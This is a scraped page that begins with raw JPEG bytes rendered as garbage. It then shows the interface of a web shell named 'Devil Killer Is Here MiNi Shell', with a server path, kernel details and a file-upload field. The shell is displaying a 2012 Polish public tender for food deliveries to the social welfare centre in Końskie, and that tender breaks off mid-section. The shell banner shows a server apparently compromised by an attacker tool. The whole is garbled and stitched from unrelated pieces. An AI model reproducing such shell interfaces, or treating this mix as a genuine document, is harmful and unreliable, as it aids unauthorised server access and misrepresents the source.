JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/238069-N-2012.html

<p class="kh_header"><b>Końskie: Dostawy artykułów żywnościowych do M-GOPS w Końskich w 2013 roku</b><br>
<b>Numer ogłoszenia: 238069 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Końskich , ul. Armii Krajowej 22, 26-200 Końskie, woj. świętokrzyskie, tel. 41 372 73 20, 372 69 05, faks 41 372 77 03.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów żywnościowych do M-GOPS w Końskich w 2013 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy artykułów żywnościowych do Miejsko-Gminnego Ośrodka Pomocy Społecznej w Końskich w 2013 roku:

Zadanie nr1-Dostawa różnych produktów spożywczych,art.sypkich,przypraw
Zadanie nr 2- Dostawa  mięsa, wędlin i tłuszczy
Zadanie nr 3- Dostawa mięsa drobiowego
Zadanie nr 4- Dostawa owoców, warzyw, kiszonek oraz jaj
Zadanie nr 5- Dostawa produktów mleczarskich
     Zadanie nr 6 -Dostawa pieczywa 
     Zadanie nr 7- Dostawa wyrobów cukierniczych
     Zadanie nr 8- Dostawa  ryb i mrożonek

     Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postepowaniu wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) załączniki do SIWZ (wypełnione)
zał.1a   lub/i
zał. 1b   lub/i 
zał. 1c   lub/i 
zał.1d    lub/i 
zał. 1 e   lub/i 
zał. 1 f   lub/i
zał. 1g   lub/i
zał. 1 h

b) pełnomocnictwo w oryginale lub kopii notarialnie poświadczonej - jeżeli osoba/y podpisująca ofertę działa na podstawie pełnomocnictwa
c) w przypadku wykonawców wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia publicznego albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)zaoferowana cena  nie może  ulec zmianie, chyba że nastąpi  zmiana podatku VAT .
b)gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgops-konskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko- Gminny Ośrodek Pomocy Społecznej, 26-200 Końskie ul. Armii Krajowej 22, pok. 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 10:00, miejsce: Miejsko- Gminny Ośrodek Pomocy Społecznej, 26-200 Końskie ul. Armii Krajowej 22, sekretariat pok. 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa różnych produktów spożywczych,art.sypkich,przypraw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy. Szczegółowy zakres określa załącznik nr 1a.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa  mięsa, wędlin i tłuszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy. 
Szczegółowy zakres określa załącznik nr 1b.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa drobiowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy. 
Szczegółowy opis określa załacznik nr 1c.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa owoców, warzyw, kiszonek oraz jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy. 
Szczegółowy opis określa załacznik nr 1d.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy. 
Szczegółowy opis przedmiotu zamówienia określa załacznik 1e.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
Zestawienie produktów i ich ilość zawarta jest w odpowiednich specyfikacjach stanowiących zapotrzebowanie roczne. Oferent powinien przede wszystkim ustalić ceny jednostkowe brutto, wartość ogólną brutto, wielkość oferowanego opakowania, ilość opakowań oraz nazwę handlową. Realizacja zamówienia odbywać się będzie sukcesywnie do końca 2013r. Dostawca zobowiązany jest do dostarczania produktów własnym transportem i na własny koszt wraz z rozładunkiem. Wszelkie dostarczane produkty żywnościowe oraz warunki dostawy muszą spełniać wymagania i procedury niezbędne do zapewnienia bezpieczeństwa żywności i żywienia zgodnie z obowiązującymi przepisami dotyczącymi bezpieczeństwa żywności i żywienia. Sposób wydania i odebrania przedmiotu umowy powinien zapewnić mu całość i nienaruszalność, a w szczególności sposób opakowania i przewozu powinien odpowiadać właściwościom rzeczy. Wykonawca w okresie obowiązywania niniejszej umowy będzie jedynym dostawcą. Przy każdej dostawie należy dostarczyć fakturę za dostarczony towar. Gramatura podana w ofercie jest obowiązkowa. Dopuszcza się zmianę w uzgodnieniu z zamawiającym. Ceny jednostkowe zostaną w takim przypadku przeliczone proporcjonalnie do cen podanych w ofercie. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w poszczególnych asortymentach w zależności od potrzeb. Ceny jednostkowe podane w ofercie są stałe i niezmienne podczas trwania umowy. Szczegółowy opis przedmiotu zamówienia określa załącznik 1f.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa wyrobów cukierniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje i wymagania dodatkowe.
Wymaga się, aby dostarczone produkty posiadały minimum 14 dniowy termin przydatności do spożycia, licząc od dnia dostawy, chyba że producent ze względu na specyfikę produktu, przewiduje krótsze terminy. 
 Warunki i zasady realizacji zamówienia:
